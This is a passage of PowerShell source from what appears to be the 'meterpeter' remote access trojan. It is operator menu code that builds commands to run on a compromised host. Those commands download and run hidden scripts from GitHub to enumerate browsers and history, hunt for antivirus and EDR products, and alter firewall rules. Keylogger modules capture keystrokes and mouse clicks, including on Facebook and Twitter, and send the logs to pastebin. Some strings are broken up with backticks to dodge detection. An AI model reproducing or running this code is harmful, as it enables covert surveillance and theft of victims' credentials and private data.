-ForegroundColor green;\r\n         write-host \"   -------     -----------                     ------------------\";\r\n         write-host \"   Start       Enumerating remote browsers     UserLand\";\r\n         write-host \"   addons      Enumerating browsers addons     UserLand\";\r\n         write-host \"   Verbose     Enumerating browsers (slow)     UserLand\";\r\n         write-host \"   Clean       Major browsers temporary files  UserLand\";\r\n         write-host \"   Return      Return to Server Main Menu\" 
-ForeGroundColor yellow;\r\n         write-host \"`n`n :meterpeter:Adv:Browser> \" -NoNewline -ForeGroundColor Green;\r\n         $Enumerate_choise = Read-Host;\r\n         If($Enumerate_choise -ieq \"Start\")\r\n         {\r\n           write-host \" * List \" -ForegroundColor Green -NoNewline\r\n           write-host \"$Remote_Host\" -ForegroundColor DarkYellow -NoNewline\r\n           write-host \" browsers!\" -ForegroundColor Green\r\n           $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetBrowsers.ps1`\" -OutFile `\"`$Env:TMP\\GetBrowsers.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\GetBrowsers.ps1 -RECON;Remove-Item -Path `$Env:TMP\\BrowserEnum.log -Force;Remove-Item -Path `$Env:TMP\\GetBrowsers.ps1 -Force\"\r\n         }\r\n         If($Enumerate_choise -ieq \"addons\")\r\n         {\r\n           write-host \" * List installed browsers addons.\" -ForegroundColor Green\r\n           $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetBrowsers.ps1`\" -OutFile `\"`$Env:TMP\\GetBrowsers.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\GetBrowsers.ps1 -ADDONS;Remove-Item -Path `$Env:TMP\\BrowserEnum.log -Force;Remove-Item -Path `$Env:TMP\\GetBrowsers.ps1 -Force\"\r\n         }\r\n         If($Enumerate_choise -ieq \"Verbose\")\r\n         {\r\n           write-host \" * Installed browsers verbose query.\" -ForegroundColor Green\r\n           write-host \"   => This function takes aprox 1 minute to finish.\" -ForegroundColor DarkYellow\r\n           $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetBrowsers.ps1`\" -OutFile `\"`$Env:TMP\\GetBrowsers.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\GetBrowsers.ps1 -ALL;Remove-Item -Path `$Env:TMP\\BrowserEnum.log -Force;Remove-Item -Path `$Env:TMP\\GetBrowsers.ps1 -Force\"\r\n         }\r\n         
If($Enumerate_choise -ieq \"Clean\")\r\n         {\r\n           write-host \" - Use ClearMyTracksByProcess? (y|n): \" -ForeGroundColor Red -NoNewline;\r\n           $ClearMyTracksByProcess = Read-Host;\r\n\r\n           write-host \" * Clean major browsers temporary files ..\" -ForegroundColor Green\r\n           If($ClearMyTracksByProcess -iMatch '^(y|yes)$')\r\n           {\r\n              write-host \"   => Extra: invoking InetCpl to clean files.\" -ForeGroundColor DarkYellow;\r\n              $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetBrowsers.ps1`\" -OutFile `\"`$Env:TMP\\GetBrowsers.ps1`\"|Out-Null;((Get-Content -Path `\"`$Env:TMP\\GetBrowsers.ps1`\" -Raw) -Replace `\"RUIUIUi0 = 'no'`\",`\"RUIUIUi0 = 'yes'`\")|Set-Content -Path `\"`$Env:TMP\\GetBrowsers.ps1`\";powershell -WindowStyle hidden -File `$Env:TMP\\GetBrowsers.ps1 -CLEAN;Remove-Item -Path `$Env:TMP\\BrowserEnum.log -Force;Remove-Item -Path `$Env:TMP\\GetBrowsers.ps1 -Force\"           \r\n           }\r\n           Else\r\n           {\r\n              $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetBrowsers.ps1`\" -OutFile `\"`$Env:TMP\\GetBrowsers.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\GetBrowsers.ps1 -CLEAN;Remove-Item -Path `$Env:TMP\\BrowserEnum.log -Force;Remove-Item -Path `$Env:TMP\\GetBrowsers.ps1 -Force\"\r\n           }\r\n         }\r\n         If($Enumerate_choise -ieq \"Return\" -or $Enumerate_choise -ieq \"cls\" -or $Enumerate_choise -ieq \"Modules\" -or $Enumerate_choise -ieq \"clear\")\r\n         {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $Enumerate_choise = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"Recent\" -or $choise -ieq \"rece\")\r\n      {\r\n         #$path = \"$env:userprofile\\AppData\\Roaming\\Microsoft\\Windows\\Recent\"\r\n         write-host \" * Listing recent directory!\" 
-ForegroundColor Green;Start-Sleep -Seconds 1\r\n         $Command = \"Get-ChildItem `$Env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Windows\\Recent|Select-Object Length,Name,CreationTime,LastWriteTime,Attributes|Format-Table -AutoSize|Select -SkipLast 1|Out-File startup.txt;Get-content startup.txt;Remove-Item startup.txt -Force\"\r\n      }\r\n      If($choise -ieq \"ListSMB\" -or $choise -ieq \"smb\")\r\n      {\r\n         write-host \" * Remote SMB shares.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\";\r\n         $Command = \"Get-SmbShare|Select-Object Name,Path,Description|ft|Out-File smb.txt;Start-Sleep -Seconds 1;`$i = Get-Content smb.txt;If(-not(`$i)){echo `\"   `> Error: none SMB accounts found under `$Env:COMPUTERNAME`\" `> smb.txt};Get-Content smb.txt;remove-item smb.txt -Force\";\r\n      }\r\n      If($choise -ieq \"StartUp\" -or $choise -ieq \"start\")\r\n      {\r\n         write-host \" * Remote host StartUp contents.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\";\r\n         $Command = \"Get-ChildItem `\"`$Env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`\"|Select-Object Length,Name,LastWriteTime|Format-Table -AutoSize|Out-File startup.txt;`$checkme = Get-Content -Path startup.txt;If(-not(`$checkme ) -or `$checkme -ieq `$null){echo `\"   `> Error: none contents found on startup directory!`\" `> startup.txt};Get-Content -Path startup.txt;Remove-Item startup.txt -Force\";\r\n      }\r\n      If($choise -ieq \"ListRun\" -or $choise -ieq \"run\")\r\n      {\r\n         write-host \" * Enumerating startup entrys (regedit)\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\"\r\n         $Command = \"REG QUERY `\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`\"|Where-Object { `$_ -ne '' }|Out-File runen.meterpeter -Force;echo `\"`\" `>`> runen.meterpeter;REG QUERY `\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce`\"| Where-Object { `$_ -ne '' } 
`>`> runen.meterpeter;echo `\"`\" `>`> runen.meterpeter;REG QUERY `\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`\"| Where-Object { `$_ -ne '' } `>`> runen.meterpeter;Get-content -Path runen.meterpeter;Remove-Item -Path runen.meterpeter -Force\";\r\n      }  \r\n      If($choise -ieq \"AntiVirus\" -or $choise -ieq \"avp\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n         write-host \"   Enumerates the most common security processes running, \";\r\n         write-host \"   AppWhitelisting, Behavioral Analysis, Intrusion Detection\";\r\n         write-host \"   DEP, DLP, Firewall, HIPS and Hunt for EDR's by driver name.\";\r\n         write-host \"`n`n   Modules   Description                    Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------   -----------                    -------------------\";\r\n         write-host \"   Primary   PrimaryAV + Security processes UserLand\";\r\n         write-host \"   FastScan  Security processes + EDR hunt  UserLand\";\r\n         write-host \"   Verbose   Full scan module (accurate)    UserLand\";\r\n         write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n         write-host \"`n`n :meterpeter:Adv:Avp> \" -NoNewline -ForeGroundColor Green;\r\n         $my_choise = Read-Host;\r\n         If($my_choise -ieq \"Primary\")\r\n         {\r\n            write-host \" * Listing Primary AV Product\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n            $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetCounterMeasures.ps1`\" -outfile `\"`$Env:TMP\\GetCounterMeasures.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\GetCounterMeasures.ps1 -Action Enum;Remove-Item -Path `$Env:TMP\\GetCounterMeasures.ps1 -Force\";\r\n         }\r\n         If($my_choise -ieq \"FastScan\")\r\n         {\r\n            write-host \" * Listing Remote Host Counter Measures 
(Fast)\" -ForegroundColor Green;\r\n            write-host \"   => Search for string(s) inside driver file description.\" -ForegroundColor DarkYellow;\r\n            write-host \"   => Slipt diferent strings to search with PIPE (|) command.\" -ForegroundColor DarkYellow;\r\n            Start-Sleep -Seconds 1\r\n            \r\n            Write-Host \" - Search for string (antimal`ware|sandboxing): \" -NoNewline;\r\n            $StringToSearch = Read-Host;\r\n            If(-not($StringToSearch) -or $StringToSearch -eq $null)\r\n            {\r\n               write-host \"   => Error: wrong input, use default strings.\" -ForegroundColor Red\r\n               $StringToSearch = \"Defender|antimal`ware|sandboxing|Symantec|AVG|Avast|BitDefender|Comodo|Cisco|ESET|FireEye|F-Secure|Kaspersky|Malwa`rebytes|McAfee|Panda|Sophos|SentinelOne\"\r\n            }\r\n\r\n            #Execute command remote\r\n            $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetCounterMeasures.ps1`\" -outfile `\"`$Env:TMP\\GetCounterMeasures.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\GetCounterMeasures.ps1 -Action 'enum' -stringsearch 'true' -string `\"$StringToSearch`\";Remove-Item -Path `$Env:TMP\\GetCounterMeasures.ps1 -Force\";\r\n         }\r\n         If($my_choise -ieq \"Verbose\")\r\n         {\r\n            write-host \" * Listing Remote Host Counter Measures (Accurate)\" -ForegroundColor Green;\r\n            write-host \"   => This function takes aprox 1 minute to finish.\" -ForegroundColor DarkYellow;Start-Sleep -Seconds 1\r\n            $StringToSearch = \"Defender|antima`lware|sandboxing|Symantec|AVG|Avast|BitDefender|Comodo|Cisco|ESET|FireEye|F-Secure|Kaspersky|Mal`warebytes|McAfee|Panda|Sophos|SentinelOne\"\r\n            $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetCounterMeasures.ps1`\" -outfile `\"`$Env:TMP\\GetCounterMeasures.ps1`\"|Unblock-File;powershell -File 
`$Env:TMP\\GetCounterMeasures.ps1 -Action Verbose -stringsearch 'true' -string `\"$StringToSearch`\";Remove-Item -Path `$Env:TMP\\GetCounterMeasures.ps1 -Force\";\r\n         }\r\n         If($my_choise -ieq \"Return\" -or $my_choise -ieq \"cls\" -or $my_choise -ieq \"Modules\" -or $my_choise -ieq \"clear\")\r\n         {\r\n           $Command = $Null;\r\n           $my_choise = $Null;\r\n         }\r\n      }  \r\n      If($choise -ieq \"FRM\" -or $choise -ieq \"FRManager\")\r\n      {\r\n         write-host \"`n`n   Remark:\" -ForegroundColor Yellow;\r\n         write-host \"   This module allow users to block connections to sellected\";\r\n         write-host \"   local_port or from remote_port (default value set: 'Any')\";\r\n         write-host \"   Warning: Total of 3 max multiple ports accepted. (Create)\" -ForegroundColor Yellow;\r\n         write-host \"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------   -----------                     -------------------\";\r\n         write-host \"   Query     Query 'active' firewall rules   \" -NoNewline\r\n         write-host \"Administrator\" -ForegroundColor Red;\r\n         write-host \"   Create    Block application\\program rule  \" -NoNewline\r\n         write-host \"Administrator\" -ForegroundColor Red;\r\n         write-host \"   Delete    Delete sellected firewall rule  \" -NoNewline\r\n         write-host \"Administrator\" -ForegroundColor Red;\r\n         write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n         write-host \"`n`n :meterpeter:Adv:Frm> \" -NoNewline -ForeGroundColor Green;\r\n         $Firewall_choise = Read-Host;\r\n         If($Firewall_choise -ieq \"Query\")\r\n         {\r\n            Write-Host \" * Listing active firewall rules.\" -ForegroundColor Green\r\n            $Command = \"iwr -Uri 
`\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/SilenceDefender_ATP.ps1`\" -OutFile `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\SilenceDefender_ATP.ps1 -Action Query;Remove-Item -Path `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\" -Force\"\r\n         }\r\n         If($Firewall_choise -ieq \"Create\")\r\n         {\r\n            Write-Host \" * Create new 'Block' firewall rule.\" -ForegroundColor Green\r\n            Write-Host \"   => Remark: Dont use double quotes in inputs!\" -ForegroundColor Yellow\r\n            \r\n            Write-Host \" - The new firewall rule DisplayName: \" -ForeGroundColor Red -NoNewline;\r\n            $DisplayName = Read-Host\r\n            If(-not($DisplayName) -or $DisplayName -ieq $null)\r\n            {\r\n               $DisplayName = \"Block-Firefox\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$DisplayName'\" -ForegroundColor Red\r\n            }\r\n\r\n            Write-Host \" - The Program to 'block' full path : \" -ForeGroundColor Red -NoNewline;\r\n            $Program = Read-Host\r\n            If(-not($Program) -or $Program -ieq $null)\r\n            {\r\n               $Program = \"$Env:ProgramFiles\\Mozilla Firefox\\firefox.exe\"\r\n               Write-Host \"   => Error: wrong input, set demo to 'firefox.exe'\" -ForegroundColor Red\r\n            }\r\n\r\n            Write-Host \" - The Program remote port to block : \" -NoNewline;\r\n            $RemotePort = Read-Host\r\n            If(-not($RemotePort) -or $RemotePort -ieq $null)\r\n            {\r\n               $RemotePort = \"Any\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$RemotePort'\" -ForegroundColor Red\r\n            }\r\n\r\n\r\n            Write-Host \" - The Program local port to block  : \" -NoNewline;\r\n            $LocalPort = Read-Host\r\n            If(-not($LocalPort) -or $LocalPort -ieq $null)\r\n            {\r\n               
$LocalPort = \"Any\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$LocalPort'\" -ForegroundColor Red\r\n            }\r\n\r\n            Write-Host \" - TCP Direction (Outbound|Inbound) : \" -NoNewline;\r\n            $Direction = Read-Host\r\n            If(-not($Direction) -or $Direction -ieq $null)\r\n            {\r\n               $Direction = \"Inbound\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$Direction'\" -ForegroundColor Red\r\n            }\r\n\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/SilenceDefender_ATP.ps1`\" -OutFile `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\SilenceDefender_ATP.ps1 -Action Create -DisplayName `\"$DisplayName`\" -Program `\"$Program`\" -LocalPort `\"$LocalPort`\" -RemotePort `\"$RemotePort`\" -Direction $Direction;Remove-Item -Path `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\" -Force\"\r\n         }\r\n         If($Firewall_choise -ieq \"Delete\")\r\n         {\r\n            Write-Host \" * Delete existing Block\\Allow firewall rule.\" -ForegroundColor Green\r\n            Write-Host \"   => Remark: Dont use double quotes in inputs!\" -ForegroundColor Yellow\r\n\r\n            Write-Host \" - The DisplayName of the rule to delete: \" -ForeGroundColor Red -NoNewline;\r\n            $DisplayName = Read-Host\r\n            If(-not($DisplayName) -or $DisplayName -ieq $null)\r\n            {\r\n               Write-Host \"`n`n   x Error: Module requires a firewall rule name.`n\" -ForegroundColor Red\r\n               $Command = $null\r\n            }\r\n            Else\r\n            {\r\n               $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/SilenceDefender_ATP.ps1`\" -OutFile `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\SilenceDefender_ATP.ps1 -Action Delete -DisplayName 
`\"$DisplayName`\";Remove-Item -Path `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\" -Force\"         \r\n            }\r\n         }\r\n         If($Firewall_choise -ieq \"Return\" -or $Firewall_choise -ieq \"cls\" -or $Firewall_choise -ieq \"Modules\" -or $Firewall_choise -ieq \"clear\")\r\n         {\r\n           $Command = $Null;\r\n           $Firewall_choise = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"Return\" -or $choise -ieq \"return\" -or $choise -ieq \"cls\" -or $choise -ieq \"Modules\" -or $choise -ieq \"modules\")\r\n      {\r\n        $Command = $Null;\r\n      }\r\n      $choise = $Null;\r\n      $Clear = $True;\r\n    }\r\n\r\n    If($Command -ieq \"keylogger\")\r\n    {\r\n       write-host \"`n`n   Description\" -ForegroundColor Yellow\r\n       write-host \"   This module captures screenshots of mouse-clicks Or,\"\r\n       write-host \"   Captures keyboard keystrokes and store them on %TMP%\"\r\n       write-host \"   Remark: Pastebin module requires 'Keystrokes' running\" -ForegroundColor Yellow\r\n       write-host \"`n`n   Modules      Description                         Remark\" -ForegroundColor green;\r\n       write-host \"   -------      -----------                         ------\";\r\n       write-host \"   Mouse        Start remote Mouse Logger           Start record remote MouseClicks\"\r\n       write-host \"   Keystrokes   Start\\Stop remote keylogger         Start record remote keyStrokes\";\r\n       write-host \"   Pastebin     Send keystrokes to pastebin         Max of 20 pastes allowed by day\";\r\n       write-host \"   Browser      Capture browser(s) tab title        Start\\Stop\\Leak windows tab title\"\r\n       write-host \"   SocialMedia  Capture keystrokes from FB\\Twitter  Start\\Stop FB,Twitter keylogger\"\r\n       write-host \"   Return       Return to Server Main Menu\" -ForeGroundColor yellow;\r\n       write-host \"`n`n :meterpeter:keyl`ogger> \" -NoNewline -ForeGroundColor Green;\r\n       $choise = 
Read-Host;\r\n       If($choise -ieq \"Browser\")\r\n       {\r\n          Write-Host \" - Start or Stop browser keylogger? (start|stop): \" -ForegroundColor Red -NoNewline\r\n          $Exechoise = Read-Host\r\n          If($Exechoise -iMatch '^(stop)$')\r\n          {\r\n             write-host \"\"\r\n             $Command = \"If(Test-Path -Path `\"`$Env:TMP\\Browser.report`\"){`$PPID = (Get-Content -Path `\"`$Env:TMP\\Browser.report`\"|Select-String -Pattern '\\s*Process Id+\\s*:+\\s') -replace '\\s*Process Id+\\s*:+\\s','';If(`$PPID){echo `\"Stoping Process ID: `$PPID`\" `> `$Env:TMP\\fdx.log;Get-Content -Path `$Env:TMP\\fdx.log;Remove-Item -Path `\"`$Env:TMP\\fdx.log`\" -Force;Stop-Process -Id `\"`$PPID`\" -Force;Get-Content -Path `$Env:TMP\\Browser.report;Remove-Item -Path `\"`$Env:TMP\\Browser.report`\" -Force;Remove-Item -Path `\"`$Env:TMP\\BrowserLogger.ps1`\" -Force}Else{echo `\"   `> Error: fail to find keyl`oger process PID`\" `> `$Env:TMP\\fdx.log;Get-Content -Path `$Env:TMP\\fdx.log;Get-Content -Path `$Env:TMP\\Browser.report;Remove-Item -Path `\"`$Env:TMP\\fdx.log`\" -Force;Remove-Item -Path `\"`$Env:TMP\\Browser.report`\" -Force;Remove-Item -Path `\"`$Env:TMP\\BrowserLogger.ps1`\" -Force}}Else{echo `\"   NotFound: `$Env:TMP\\Browser.report`\" `> `$Env:TMP\\fdx.log;Get-Content -Path `$Env:TMP\\fdx.log;Remove-Item -Path `\"`$Env:TMP\\fdx.log`\" -Force;Remove-Item -Path `\"`$Env:TMP\\BrowserLogger.ps1`\" -Force}\"\r\n          }\r\n          Else\r\n          {\r\n             Write-Host \" - Delay time (in seconds) between captures (3): \"  -NoNewline\r\n             $Delay = Read-Host\r\n             If($Delay -lt 3)\r\n             {\r\n                write-host \"   => Error: wrong input, default to 3 (sec)\" -ForegroundColor Red\r\n             }\r\n\r\n             $StarTimer = (Get-Date -Format 'HH:mm')\r\n             Write-Host \" - Schedule the capture start time? 
($StarTimer|now): \" -ForeGroundColor Red -NoNewline\r\n             $StartMe = Read-Host\r\n             If($StartMe -NotMatch '^(\\d+\\d+:+\\d+\\d)$')\r\n             {\r\n                $StartMe = \"now\"\r\n             }\r\n\r\n             Write-Host \" - Dump installed browsers url history? (y|n)  : \" -NoNewline\r\n             $DumpHistory = Read-Host\r\n             If($DumpHistory -Match '^(y|yes)$')\r\n             {\r\n                $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/browserLogger.ps1`\" -OutFile `\"`$Env:TMP\\browserLogger.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file `$Env:TMP\\browserLogger.ps1 -starttime $StartMe -delay $Delay -log -history -force true`\";echo `\"`n   `> Browser key`logger schedule to: [$StartMe] hours`\";echo `\"   `> Logfile: `$Env:TMP\\Browser.report`\"\"\r\n             }\r\n             Else\r\n             {\r\n                $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/browserLogger.ps1`\" -OutFile `\"`$Env:TMP\\browserLogger.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file `$Env:TMP\\browserLogger.ps1 -starttime $StartMe -delay $Delay -log -force true`\";echo `\"`n   `> Browser keylo`gger schedule to: [$StartMe] hours`\";echo `\"   `> Logfile: `$Env:TMP\\Browser.report`\"\"           \r\n             }\r\n          }\r\n       }\r\n       If($choise -ieq \"SocialMedia\")\r\n       {\r\n          write-host \"`n   👁‍🗨 Module description 👁‍🗨\" -ForegroundColor Yellow\r\n          write-host \"   This module starts recording keystr`okes if facebook or twitter\"\r\n          write-host \"   is active on browser tab, and it stops\\resumes capture if user\"\r\n          write-host \"   switchs from social media to another website or closes browser.`n\"\r\n\r\n          Write-Host \" - Start or Stop browser key`logger (\" 
-NoNewline -ForegroundColor Red\r\n          Write-Host \"Start\" -NoNewline -ForegroundColor Yellow\r\n          Write-Host \"|\" -NoNewline -ForegroundColor Red\r\n          Write-Host \"Stop\" -NoNewline -ForegroundColor Yellow\r\n          Write-Host \"): \" -NoNewline -ForegroundColor Red\r\n\r\n          $ModeChoise = Read-Host\r\n          If($ModeChoise -iMatch '^(Start)$')\r\n          {\r\n             ## module header\r\n             $CurrentTime = (Get-Date -Format 'HH:mm')\r\n             write-host \"`n   The Run-And-LetGo function allow users to execute the module even\" -ForegroundColor DarkYellow\r\n             write-host \"   if target browser its closed and sends logfiles to pastebin server\" -ForegroundColor DarkYellow\r\n             write-host \"   if target user switchs from social media to another website (tab)`n\" -ForegroundColor DarkYellow\r\n\r\n             Write-Host \" - Key`logger execution mode (\" -NoNewline -ForegroundColor Red\r\n             Write-Host \"normal\" -NoNewline -ForegroundColor Yellow\r\n             Write-Host \"|\" -NoNewline -ForegroundColor Red\r\n             Write-Host \"LetGo\" -NoNewline -ForegroundColor Yellow\r\n             Write-Host \") : \" -NoNewline -ForegroundColor Red\r\n\r\n             $ModeSet = Read-Host\r\n             If($ModeSet -iMatch '^(LetGo)$')\r\n             {\r\n                $SetMeUp = \"True\"\r\n                $RawTime = (Get-Date -Format 'HH:mm')\r\n                Write-Host \" - Schedule cmdlet execution at ($RawTime|now): \" -NoNewline\r\n                $ForceOrNot = Read-Host\r\n                If($ForceOrNot -iMatch '^(now)$')\r\n                {\r\n                   ## meterpeter module output\r\n                   write-host \"`n`n   [\" -ForegroundColor Green -NoNewline\r\n                   write-host \"$CurrentTime\" -NoNewline\r\n                   write-host \"] 👁‍🗨 Social media key`logger 👁‍🗨\" -ForegroundColor Green\r\n\r\n                   write-host \"   💀 
Starting key`logger in background!\"\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"SendToPasteBin  : \" -NoNewline\r\n                   write-host \"$SetMeUp\" -ForegroundColor Green\r\n\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"IsBrowserActive : \" -NoNewline\r\n                   write-host \"by`pass\" -ForegroundColor Green\r\n\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"LoopDelayTime   : \" -NoNewline\r\n                   write-host \"1200`n\" -ForegroundColor Green\r\n\r\n                   ## execute command \r\n                   $Command = \"cd `$Env:TMP;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Dump-Browser/SocialMedia.ps1`\" -OutFile `\"SocialMedia.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file SocialMedia.ps1 -mode start -force -sendtopastebin`\"\"\r\n                }\r\n                Else\r\n                {\r\n                   $SetMeUp = \"True\"\r\n                   If(-not($ForceOrNot -match '^(\\d+\\d+:+\\d+\\d)$'))\r\n                   {\r\n                      $ForceOrNot = \"now\"\r\n                   }\r\n\r\n                   Write-Host \" - Cmdlet delay time [Millisecons] (1700)  : \" -NoNewline\r\n                   $LoopDelayTime = Read-Host\r\n                   If([string]::IsNullOrEmpty($LoopDelayTime))\r\n                   {\r\n                      $LoopDelayTime = \"1700\"\r\n                   }\r\n                   \r\n                   If($LoopDelayTime -match 1200)\r\n                   {\r\n                      $ColorChoise = \"Green\"\r\n                   }\r\n                   Else\r\n                   {\r\n                      $ColorChoise = \"Red\"                   \r\n                   }\r\n\r\n                   ## meterpeter 
module output\r\n                   write-host \"`n`n   [\" -ForegroundColor Green -NoNewline\r\n                   write-host \"$CurrentTime\" -NoNewline\r\n                   write-host \"] 👁‍🗨 Social media key`logger 👁‍🗨\" -ForegroundColor Green\r\n\r\n                   write-host \"   💀 Starting key`logger in background!\"\r\n                   write-host \"   ⛑️ Schedule capture to: \" -NoNewline\r\n                   write-host \"$ForceOrNot\" -ForegroundColor Green -NoNewline\r\n                   write-host \" hours.\"\r\n\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"SendToPasteBin  : \" -NoNewline\r\n                   write-host \"$SetMeUp\" -ForegroundColor Green\r\n\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"IsBrowserActive : \" -NoNewline\r\n                   write-host \"byp`ass\" -ForegroundColor Green\r\n\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"LoopDelayTime   : \" -NoNewline\r\n                   write-host \"$LoopDelayTime`n\" -ForegroundColor $ColorChoise\r\n\r\n                   ## Execute command [start key`logger schedule]\r\n                   $Command = \"cd `$Env:TMP;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Dump-Browser/SocialMedia.ps1`\" -OutFile `\"SocialMedia.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file SocialMedia.ps1 -schedule '$ForceOrNot' -mode start -delay $LoopDelayTime -force -sendtopastebin`\"\"\r\n                }\r\n             }\r\n             Else\r\n             {\r\n                $SetMeUp = \"False\"\r\n                $RawTime = (Get-Date -Format 'HH:mm')\r\n                Write-Host \" - Schedule cmdlet execution at ($RawTime|now): \" -NoNewline\r\n                $ForceOrNot = Read-Host\r\n                If($ForceOrNot -iMatch 
'^(now)$')\r\n                {\r\n                   ## meterpeter module output\r\n                   write-host \"`n`n   [\" -ForegroundColor Green -NoNewline\r\n                   write-host \"$CurrentTime\" -NoNewline\r\n                   write-host \"] 👁‍🗨 Social media key`logger 👁‍🗨\" -ForegroundColor Green\r\n\r\n                   write-host \"   💀 Starting key`logger in background!\"\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"SendToPasteBin  : \" -NoNewline\r\n                   write-host \"$SetMeUp\" -ForegroundColor Red\r\n\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"IsBrowserActive : \" -NoNewline\r\n                   write-host \"check\" -ForegroundColor Red\r\n\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"LoopDelayTime   : \" -NoNewline\r\n                   write-host \"1200`n\" -ForegroundColor Green\r\n\r\n                   ## Execute command [start key`logger normal]\r\n                   $Command = \"cd `$Env:TMP;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Dump-Browser/SocialMedia.ps1`\" -OutFile `\"SocialMedia.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file SocialMedia.ps1 -mode start`\"\"\r\n                }\r\n                Else\r\n                {\r\n                   $SetMeUp = \"False\"\r\n                   If(-not($ForceOrNot -match '^(\\d+\\d+:+\\d+\\d)$'))\r\n                   {\r\n                      $ForceOrNot = \"now\"\r\n                   }\r\n\r\n                   ## meterpeter module output\r\n                   write-host \"`n`n   [\" -ForegroundColor Green -NoNewline\r\n                   write-host \"$CurrentTime\" -NoNewline\r\n                   write-host \"] 👁‍🗨 Social media key`logger 👁‍🗨\" -ForegroundColor Green\r\n\r\n              
     write-host \"   💀 Starting key`logger in background!\"\r\n                   write-host \"   ⛑️ Schedule capture to: \" -NoNewline\r\n                   write-host \"$ForceOrNot\" -ForegroundColor Green -NoNewline\r\n                   write-host \" hours.\"\r\n\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"SendToPasteBin  : \" -NoNewline\r\n                   write-host \"$SetMeUp\" -ForegroundColor Red\r\n\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"IsBrowserActive : \" -NoNewline\r\n                   write-host \"check\" -ForegroundColor Red\r\n\r\n                   write-host \"   👁️ \" -ForegroundColor Green -NoNewline\r\n                   write-host \"LoopDelayTime   : \" -NoNewline\r\n                   write-host \"1200`n\" -ForegroundColor Green\r\n\r\n                   ## Execute command [start key`logger schedule]\r\n                   $Command = 